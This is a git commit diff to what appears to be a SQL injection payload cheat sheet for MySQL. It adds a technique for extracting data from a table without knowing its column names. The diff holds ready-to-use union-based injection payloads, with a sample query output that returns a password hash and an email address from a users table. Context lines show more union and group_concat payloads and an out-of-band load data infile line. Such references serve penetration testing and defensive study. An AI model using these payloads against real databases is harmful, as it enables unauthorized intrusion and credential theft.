MYSQL - Extract data without columns name

2019-02-17 21:51:21 +01:00 · 2019-02-17 21:51:21 +01:00 · 40f86d39b0
parent 78c882fb34
commit 40f86d39b0
1 changed files with 22 additions and 1 deletions
--- a/injection/MySQL
+++ b/injection/MySQL
@ -30,6 +30,26 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_sc
 UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
 ```
 ### Extract data without information_schema 
 Extracting data from the 4th column without knowing its name.
 ```sql
 select `4` from (select 1,2,3,4,5,6 union select * from users)dbname;
 ```
 Injection example inside the query `select author_id,title from posts where author_id=[INJECT_HERE]`
 ````sql
 MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select concat(`3`,0x3a,`4`) from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
 +-----------+-----------------------------------------------------------------+
 | author_id | title                                                           |
 +-----------+-----------------------------------------------------------------+
 |         1 | a45d4e080fc185dfa223aea3d0c371b6cc180a37:veronica80@example.org |
 +-----------+-----------------------------------------------------------------+
 ```
 ## MYSQL Error Based - Basic
 ```sql
@ -162,3 +182,4 @@ load data infile '\\\\error\\abc' into table database.table_name;
 ## References
 - [MySQL Out of Band Hacking - @OsandaMalith](https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf)
 - [[Sqli] Extracting data without knowing columns names - Ahmed Sultan @0x4148](https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/)